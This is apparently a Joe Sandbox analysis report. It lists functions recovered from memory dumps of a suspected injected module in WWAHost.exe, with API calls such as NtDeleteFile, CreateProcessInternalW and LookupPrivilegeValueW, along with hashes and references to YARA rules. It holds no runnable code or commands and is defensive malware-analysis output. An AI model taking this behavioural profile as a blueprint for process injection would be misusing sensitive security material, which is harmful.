Function 02D4C860 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(02D4722E,00000206,?,02D4722E,00000005,FFFFFFFF), ref: 02D4C885

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction ID: 21bbeb7f8f9506d1adf9c9ee78c12695a7dcd9d080f35b540e1b73c650ccf5ab
Opcode Fuzzy Hash: 6f36c58043209be16d439a3199aaaee235847fb3c9824624ee7abedc41f38536
Instruction Fuzzy Hash: 8ED01772210214ABD614EBA8DC89E9B7BADDF88660F014155BA4D5B342CA30FA008AE0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4C830 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON

Download Yara Rule

APIs

NtDeleteFile.NTDLL(02D47052,00000206,?,02D47052,00000005,00000018,?,?,00000000,00000206,?), ref: 02D4C855

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
Instruction ID: fb41355e945127bd46ea9429a75f2c184270b9a63f1f8108c7fa424e80a10f1a
Opcode Fuzzy Hash: 126503524c9acbe21b9fd4f7b6543455c439e56fec7c83ecdd5a34c5492c7759
Instruction Fuzzy Hash: 52D01772210214ABD710EB98DC89E977BADEF88760F114459BA4D5B341CA30FA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 040234E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 040234EA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b35c63f7fb6819e334309aaa9d8ee3d11eb4632cf907b206f7c3980e6da37e5
Instruction ID: e392deb8079204c46ae462848f532891534c4426280e3d683c29f15d2bd2b4cf
Opcode Fuzzy Hash: 7b35c63f7fb6819e334309aaa9d8ee3d11eb4632cf907b206f7c3980e6da37e5
Instruction Fuzzy Hash: 6590023260510402F50072588614706144987D1246F61C855B4416568DC7A5D95175A2

Uniqueness

Uniqueness Score: -1.00%

Function 04022C30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022C3A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3573319b09ae1e6c72fb25b65bd6b9a82c35236c6d34aac3649cfd6c85730f3c
Instruction ID: 3db39d010c17e69e680f8bb7acc6d937fd4b38ff03a5a217dd30816e5379957b
Opcode Fuzzy Hash: 3573319b09ae1e6c72fb25b65bd6b9a82c35236c6d34aac3649cfd6c85730f3c
Instruction Fuzzy Hash: 5E90022A21300002F5807258950860A044987D2247F91D859B4007558CC925D8696321

Uniqueness

Uniqueness Score: -1.00%

Function 04022CF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022CFA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ca1327912dc8d28f91c327d16c4605da4963613b4e206ef9757b642923d0a70d
Instruction ID: 5490cf1610e5828fcd67501a86644f302a9643799632fe87b5db5523c6429163
Opcode Fuzzy Hash: ca1327912dc8d28f91c327d16c4605da4963613b4e206ef9757b642923d0a70d
Instruction Fuzzy Hash: 7490022224204152B945B2588504507444A97E1286791C456B5406950CC536E856E621

Uniqueness

Uniqueness Score: -1.00%

Function 04022D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022D1A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6da14ea786666edb494bd05a270047690f500815c0d7c3e285ed5af228184f4f
Instruction ID: 83c81d0a13fc63b143e6c56fb9b8f074c64c4f38e9490590f1c8ec551fc6f6a9
Opcode Fuzzy Hash: 6da14ea786666edb494bd05a270047690f500815c0d7c3e285ed5af228184f4f
Instruction Fuzzy Hash: 9190023220100413F51172588604707044D87D1286F91C856B4416558DD666D952B121

Uniqueness

Uniqueness Score: -1.00%

Function 04022DC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022DCA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 19f8e676668e8187d54a52678655692fc7e15c45dc29c991e1943a965001e73f
Instruction ID: 88cb9ee318e8da489621c49a0b6ce22de74fc12dd1fdef5bcaba7165e8278d61
Opcode Fuzzy Hash: 19f8e676668e8187d54a52678655692fc7e15c45dc29c991e1943a965001e73f
Instruction Fuzzy Hash: FA90027220100402F54072588504746044987D1346F51C455B9056554EC669DDD57665

Uniqueness

Uniqueness Score: -1.00%

Function 04022E50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022E5A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b704b8035ccd27b3918af3bd8a32eb5470962b7e7fa1ee319e6bc96b4733062d
Instruction ID: 1f2689e99fa5f862ff086660998c7e721b9bb839838e75be8af132af8af1e596
Opcode Fuzzy Hash: b704b8035ccd27b3918af3bd8a32eb5470962b7e7fa1ee319e6bc96b4733062d
Instruction Fuzzy Hash: 9290026234100442F50072588514B060449C7E2346F51C459F5056554DC629DC527126

Uniqueness

Uniqueness Score: -1.00%

Function 04022F00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022F0A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7283245d8828dabcbf3766c826875743237214bf63289aa43657c03efe4f6964
Instruction ID: 640c53c42044b4f19730e995dd15bd9524bf23e2cc3c0a5cd8ebf64e45e788fe
Opcode Fuzzy Hash: 7283245d8828dabcbf3766c826875743237214bf63289aa43657c03efe4f6964
Instruction Fuzzy Hash: B790022221180042F60076688D14B07044987D1347F51C559B4146554CC925D8616521

Uniqueness

Uniqueness Score: -1.00%

Function 040229F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 040229FA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 49b93db0c4f87706b8efa7fd3bc37ffd99e3e5e9ce2db5509cfba6ffec5a9b05
Instruction ID: 9f896bba083a1ff8aacee9e5e304ef5eba1026b5ae67b0c364b1e01adab033f0
Opcode Fuzzy Hash: 49b93db0c4f87706b8efa7fd3bc37ffd99e3e5e9ce2db5509cfba6ffec5a9b05
Instruction Fuzzy Hash: D6900226211000036505B6584704507048A87D6396351C465F5007550CD631D8616121

Uniqueness

Uniqueness Score: -1.00%

Function 04022A10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022A1A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 240744e80d9514ab7ab74c6382bca4e363c127f6963a58a11f044b6acec60664
Instruction ID: 270ff6d3da87974cd264f43e1ce4f3d940abb7a01b60b52ff3220d9daa820db5
Opcode Fuzzy Hash: 240744e80d9514ab7ab74c6382bca4e363c127f6963a58a11f044b6acec60664
Instruction Fuzzy Hash: FE900226221000026545B658470450B088997D7396391C459F5407590CC631D8656321

Uniqueness

Uniqueness Score: -1.00%

Function 04022A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022A8A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: eb93f74ba0114405be95102c20b9bc0a4f28f336ea3bfff36f0e4ff3be0bb863
Instruction ID: 0080daf9faab09e308942f5ae2530e6a1782f649cf12f7bfc053ed8005edb99e
Opcode Fuzzy Hash: eb93f74ba0114405be95102c20b9bc0a4f28f336ea3bfff36f0e4ff3be0bb863
Instruction Fuzzy Hash: 5D90026220200003A50572588514616444E87E1246B51C465F5006590DC535D8917125

Uniqueness

Uniqueness Score: -1.00%

Function 04022AC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022ACA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5ded726ef39242e75049786cb8003dd8f23392e66d82d48f4a401225c362c690
Instruction ID: cd50aaf6c798693fe1b21aed3af67389907cdfcd3b6ee6b2911ba5fb31fda5b2
Opcode Fuzzy Hash: 5ded726ef39242e75049786cb8003dd8f23392e66d82d48f4a401225c362c690
Instruction Fuzzy Hash: E090023260500802F55072588514746044987D1346F51C455B4016654DC765DA5576A1

Uniqueness

Uniqueness Score: -1.00%

Function 04022B00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022B0A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a9ede767ef75ef479448aee21152140b5bd67e2c09150eb44438297d26f7c66a
Instruction ID: ab5a7b41f0ac18fd2f77f1490fba945d5fcdd0b213044b48c3d77045496bc170
Opcode Fuzzy Hash: a9ede767ef75ef479448aee21152140b5bd67e2c09150eb44438297d26f7c66a
Instruction Fuzzy Hash: 4290023220504842F54072588504A46045987D134AF51C455B4056694DD635DD55B661

Uniqueness

Uniqueness Score: -1.00%

Function 04022B10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022B1A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ce2aee37c34373551f99267725f198885096adc3088df124d5e64f3d31396022
Instruction ID: 86d3ecf6d5e383cb440b0c0bebe945089a14469c14600c137888bd41fa84dcb6
Opcode Fuzzy Hash: ce2aee37c34373551f99267725f198885096adc3088df124d5e64f3d31396022
Instruction Fuzzy Hash: C990023220100802F5807258850464A044987D2346F91C459B4017654DCA25DA5977A1

Uniqueness

Uniqueness Score: -1.00%

Function 04022B80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022B8A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 00fa46a1b8b0f31e20908d700323cd27e71c36224382d2a4debb395466c44aed
Instruction ID: cff6bc07c372caff3a59b8d57b30d9a42b75559ec0f9cfbe06ef5915fb0f25ca
Opcode Fuzzy Hash: 00fa46a1b8b0f31e20908d700323cd27e71c36224382d2a4debb395466c44aed
Instruction Fuzzy Hash: 8590023220100842F50072588504B46044987E1346F51C45AB4116654DC625D8517521

Uniqueness

Uniqueness Score: -1.00%

Function 04022B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022B9A

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9d682e4d9fff7c5923f1cbc6f02c52b350d2eb922266586b468f4e9af3a59e27
Instruction ID: 733e4e3bf56058c6cfe0714c0605411233884d652e91ece02cdd66e89dd6e6cc
Opcode Fuzzy Hash: 9d682e4d9fff7c5923f1cbc6f02c52b350d2eb922266586b468f4e9af3a59e27
Instruction Fuzzy Hash: EF90023220108802F5107258C50474A044987D1346F55C855B8416658DC6A5D8917121

Uniqueness

Uniqueness Score: -1.00%

Function 04022BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04022BCA

Memory Dump Source

Source File: 00000005.00000002.22570082825.0000000003FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FB0000, based on PE: true

Associated: 00000005.00000002.22574776994.00000000040D9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.22574834601.00000000040DD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_3fb0000_WWAHost.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b761812fc248370a7edf900317156a7a62398b1b0d400bc82da7bc30f8acdfe5
Instruction ID: 527d957bd5bc000fc2360ceefb5230b75b21cb9dceb28635e403ce0bdbfbde47
Opcode Fuzzy Hash: b761812fc248370a7edf900317156a7a62398b1b0d400bc82da7bc30f8acdfe5
Instruction Fuzzy Hash: 5490023220100402F50076989508646044987E1346F51D455B9016555EC675D8917131

Uniqueness

Uniqueness Score: -1.00%

Function 02D4B410 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D4B4CB

Strings

wininet.dll, xrefs: 02D4B472, 02D4B47E
net.dll, xrefs: 02D4B48B, 02D4B51A, 02D4B4F2, 02D4B4FE, 02D4B526

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 3b9c0098db19089a2fd764577630a31785623dc390aa7859de9318014e9d4d6d
Instruction ID: c8036e288c5c954bc7325be362da92d2ef2c8a1a8e4b12961b5886b85967e1c6
Opcode Fuzzy Hash: 3b9c0098db19089a2fd764577630a31785623dc390aa7859de9318014e9d4d6d
Instruction Fuzzy Hash: 30316FB5A00604ABD714DFA4D885FA7B7B9EB48708F04852EE59D5B344D770A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4B404 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 02D4B4CB

Strings

wininet.dll, xrefs: 02D4B472, 02D4B47E
net.dll, xrefs: 02D4B48B, 02D4B4F2, 02D4B4FE

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: c3de7cc03a12a490fde50dd676930693fa087aaf34a0e226c5747fd64a481688
Instruction ID: ec05e36b995b9908674c0d08428a0ab56d193f99c18deeaa4cf647db5d62c808
Opcode Fuzzy Hash: c3de7cc03a12a490fde50dd676930693fa087aaf34a0e226c5747fd64a481688
Instruction Fuzzy Hash: FC31D1B1A00205ABD714DFB4D8C5FAAF7B9FB48708F00852AE65D5B344D7B0A944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D44D00 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 02D44D17

Strings

@J7<, xrefs: 02D44D2B

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: ae0a963fbde7446caac231179a3969e14f0692f2f31a6a41fb2d0ac69b0ea8e8
Instruction ID: 8e384dba8a38ecdfb107e2a0ab4d9713035fdee291989cbf8aae27641c642307
Opcode Fuzzy Hash: ae0a963fbde7446caac231179a3969e14f0692f2f31a6a41fb2d0ac69b0ea8e8
Instruction Fuzzy Hash: 1531EDB5A0060AAFDB10DFD8D8809EFB7B9FF88304B108559E515AB314DB75EE45CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D37630 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0000000D,00000111,00000000,00000000,?), ref: 02D3768A
PostThreadMessageW.USER32(0000000D,00008003,00000000,?,00000000), ref: 02D376AB

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5908855240c0542f89982b20b2bd1ace687ada45408b6786a88172872e0350de
Instruction ID: 4997e686e41cc9edc8f3fc0ef6492dd8adb057f1cc07c4b0b504f7cb2502146f
Opcode Fuzzy Hash: 5908855240c0542f89982b20b2bd1ace687ada45408b6786a88172872e0350de
Instruction Fuzzy Hash: F301A771A802287BF761A694DC42FFE776DAB00B51F050514FF44BA2C0EB946D064BF5

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CA32 Relevance: 3.0, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(02D469E6,?,02D4718D,02D4718D,?,02D469E6,?,?,?,?,?,00000000,00000005,00000206), ref: 02D4CA2D
RtlFreeHeap.NTDLL(00000060,00000005,00000000,00000000,00000005,00000060,00000000,00000000,?,?,00000000,00000206,?), ref: 02D4CA6D

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree
String ID:
API String ID: 2488874121-0
Opcode ID: 3c677019b2a790279d68ec85970fb85fb5783cc486f07ebd4e90e4cdb08cbd3a
Instruction ID: e723794e4cfd749300957a41e832817cf34b0358e56bd67e6277cacb23126dae
Opcode Fuzzy Hash: 3c677019b2a790279d68ec85970fb85fb5783cc486f07ebd4e90e4cdb08cbd3a
Instruction Fuzzy Hash: BFE02BB82542851BD718FF79A8818B77785EF81219700554FE48847303D531C81587B1

Uniqueness

Uniqueness Score: -1.00%

Function 02D3F7C0 Relevance: 1.7, APIs: 1, Instructions: 180COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 02D3F8A8

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 8fc12f8a17d6dc26bd120e9c5f120d8739a1911848b9d334a9ef77e2ca462c04
Instruction ID: b5a7ed3ccd1e7438b9d30eadee32119d0a831cb33394335fd9c5d1860f64dd7b
Opcode Fuzzy Hash: 8fc12f8a17d6dc26bd120e9c5f120d8739a1911848b9d334a9ef77e2ca462c04
Instruction Fuzzy Hash: C25153B68002187BDB65EB64CC85FEB737DEF44304F004A99A65997251EE30AA85CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 02D3ABC0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 02D3AC32

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
Instruction ID: 6aab2d8cd7f0a08186a7d2a1a852d1a7dcbcbaad73fa7fce3683f1c7e2b582a2
Opcode Fuzzy Hash: ca96a5e8033b6ad7c61fa57df96aefaf7a797af34e398c22907a0c48103412d1
Instruction Fuzzy Hash: 8C011EB9E0020DABDB10EBA4DC41F9DB3799B54308F044195A90897681FA31EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CAAD Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,?,?,00000010,?,00000044,?,?,?,00000044,?,00000010,?,?,?,?), ref: 02D4CB04

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: ec59be09a082562e69b5c2b3506e000cefeeded1d5a95795ee9e7afc3623cbc5
Instruction ID: 1ac8ae50429eeee994dce0ce6dde6ba9d160fec753639deb7747227c6d7568fb
Opcode Fuzzy Hash: ec59be09a082562e69b5c2b3506e000cefeeded1d5a95795ee9e7afc3623cbc5
Instruction Fuzzy Hash: 7301A4B2210108BFCB58DF99DC80EEB77ADAF8C354F118259BA4DD7251C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02D4CC11 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,02D3DC32,02D3DC32,?,00000000,?,?), ref: 02D4CBD0

Memory Dump Source

Source File: 00000005.00000002.22561838219.0000000002D30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d30000_WWAHost.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 97fc873196e106986d6c8f7d006ce557c2d6f956e3718fe7133b42ac837bd91d
Instruction ID: 8f782fc5f7bb7514e762a41a973df7b19273882f17271bee60b5e0815078b8f2
Opcode Fuzzy Hash: 97fc873196e106986d6c8f7d006ce557c2d6f956e3718fe7133b42ac837bd91d
